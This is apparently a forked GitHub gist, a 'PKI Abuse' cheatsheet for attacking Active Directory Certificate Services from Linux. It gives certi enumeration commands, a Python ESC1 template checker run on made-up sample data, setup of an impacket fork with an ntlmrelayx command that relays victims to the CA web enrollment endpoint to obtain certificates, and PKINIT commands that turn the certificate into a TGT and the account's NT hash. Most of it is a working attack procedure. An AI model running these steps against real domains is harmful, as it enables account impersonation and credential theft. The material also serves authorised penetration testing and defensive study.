@johnjohnsp1
Forked from Flangvik/PKI_Abuse_cheatsheet.md
Created September 20, 2021 14:10
PKI Abuse CheatSheet

PKI Abuse

Enumerating ADCS On Linux

Download and install Certi

git clone https://github.com/eloypgz/certi
cd certi
python3 setup.py install

Certi only supports Kerberos authentication, so to perform authenticated enumeration you first need a TGT for a valid user. impacket's getTGT.py takes only the identity as a positional argument and writes the ticket to <username>.ccache in the current directory:

getTGT.py '<domain>/<username>:<password>' -dc-ip <dc-ip>

Point KRB5CCNAME at the resulting ccache so certi picks it up:

export KRB5CCNAME=<username>.ccache

Enumerate the Certificate Authorities (CAs) in the domain

python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class ca

Enumerate vulnerable templates (only those enabled on a CA)

python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enable
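What certi's `--vuln` listing is looking for is a template whose settings, taken together, let a low-privileged user request a logon certificate for an arbitrary account (the ESC1 case). The script below is an added illustration of that check written for this cheatsheet; it is not certi's own code, and certi's exact criteria may differ. The template records are constructed dicts standing in for the LDAP attributes of pKICertificateTemplate objects, the domain SID is made up, and the `enroll` list is an assumed, already-parsed set of SIDs holding the Enroll right.

```python
# Added example for this cheatsheet: the ESC1-style logic behind a "vuln"
# template listing. Illustrative code, not certi's own implementation.
# The template records are constructed dicts standing in for the LDAP
# attributes of pKICertificateTemplate objects; "enroll" is an assumed,
# already-parsed list of SIDs holding the Enroll right (certi reads the
# real nTSecurityDescriptor over LDAP).

# msPKI-Certificate-Name-Flag bit: the requester supplies subject/SAN in the CSR
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request is parked for CA manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# pKIExtendedKeyUsage OIDs that make an issued certificate usable for AD logon
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Groups that practically every domain account belongs to: full SIDs for
# well-known groups, bare RIDs for domain-relative ones.
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}  # Everyone, Authenticated Users, Users
LOW_PRIV_RIDS = {"513", "515"}                            # Domain Users, Domain Computers


def allows_auth(ekus):
    """An empty EKU list means 'any purpose' to Windows, so it counts too."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def low_priv_can_enroll(enroll_sids):
    """True if any enrolling principal is one of the catch-all groups."""
    return any(sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS
               for sid in enroll_sids)


def esc1_blockers(t):
    """Return the ESC1 preconditions this template fails to satisfy.

    An empty list means ESC1 applies: a low-privileged user can enroll and
    choose the UPN in the SAN, i.e. obtain a certificate for any account and
    use it for PKINIT.
    """
    blockers = []
    if not t["published_on"]:
        blockers.append("not published on any CA")
    if not t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("subject is built from AD, not from the CSR")
    if t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if t["ra_signatures"] > 0:
        blockers.append("authorized signatures required")
    if not allows_auth(t["ekus"]):
        blockers.append("no authentication EKU")
    if not low_priv_can_enroll(t["enroll"]):
        blockers.append("no low-privileged enrollment rights")
    return blockers


def vulnerable_templates(templates):
    """Sorted names of templates with no ESC1 blockers."""
    return sorted(name for name, t in templates.items() if not esc1_blockers(t))


# Constructed sample data (a made-up domain SID; not taken from any real environment)
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
DOMAIN_USERS = DOMAIN_SID + "-513"
DOMAIN_ADMINS = DOMAIN_SID + "-512"


def _template(name_flag, enrollment_flag, ekus, enroll, published=("corp-CA01-CA",), ra=0):
    return {"published_on": list(published), "name_flag": name_flag,
            "enrollment_flag": enrollment_flag, "ra_signatures": ra,
            "ekus": ekus, "enroll": enroll}


SAMPLE_TEMPLATES = {
    # the classic ESC1 misconfiguration
    "VPNAccess": _template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, ["1.3.6.1.5.5.7.3.2"], [DOMAIN_USERS]),
    # constructed name flags without the ENROLLEE_SUPPLIES_SUBJECT bit: UPN comes from the AD object
    "User": _template(0xA6000000, 0, ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"], [DOMAIN_USERS]),
    # requester picks the subject, but only Server Authentication is allowed
    "WebServer": _template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, ["1.3.6.1.5.5.7.3.1"], [DOMAIN_USERS]),
    # every request waits for a CA manager
    "OfflineRouter": _template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, CT_FLAG_PEND_ALL_REQUESTS, ["1.3.6.1.5.5.7.3.2"], [DOMAIN_USERS]),
    # only Domain Admins may enroll
    "AdminAuth": _template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, ["1.3.6.1.5.5.7.3.2"], [DOMAIN_ADMINS]),
    # present in AD but not enabled on any CA
    "Unpublished": _template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, [], [DOMAIN_USERS], published=()),
}

if __name__ == "__main__":
    for name, t in SAMPLE_TEMPLATES.items():
        blockers = esc1_blockers(t)
        print(f"{name:14} {'ESC1' if not blockers else 'ok: ' + '; '.join(blockers)}")
```

Only `VPNAccess` comes out as ESC1; each of the others is blocked by exactly one of the six conditions, which is the same list of things to read off a template object (name flags, enrollment flags, RA signature count, EKUs, enrollment ACL, publication on a CA) when checking a tool's output by hand.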

Requesting certs from a CA on Linux

Relaying On Linux

Relaying incoming SMB/HTTP connections to the ADCS web enrollment endpoint to generate a certificate on

Fetch and install a custom fork of impacket

git clone https://github.com/ExAndroidDev/impacket.git
cd impacket
git checkout ntlmrelayx-adcs-attack

Create a virtual Python env to contain this version of impacket (avoids breaking the release you already have installed)

apt install python3-venv
python3 -m venv adcs-impacket

Activate the virtual env

source adcs-impacket/bin/activate

Still inside the impacket folder

pip3 install .

You can now set up ntlmrelayx for relaying. The relay only works while the CA's web enrollment endpoint accepts NTLM over plain HTTP without Extended Protection for Authentication; the fork prints the issued certificate as a base64-encoded PFX once a victim connects.

python3 examples/ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template <template-name>

Authentication using a certificate on Linux (gettgtpkinit.py from PKINITtools)

python3 gettgtpkinit.py <domain>/<username> -pfx-base64 $(cat <base64-cert.file>) -dc-ip <dc-ip> out_tgt.ccache

Keep the AS-REP encryption key the script prints: getnthash.py from the same toolkit needs it, together with the ccache, to recover the account's NT hash.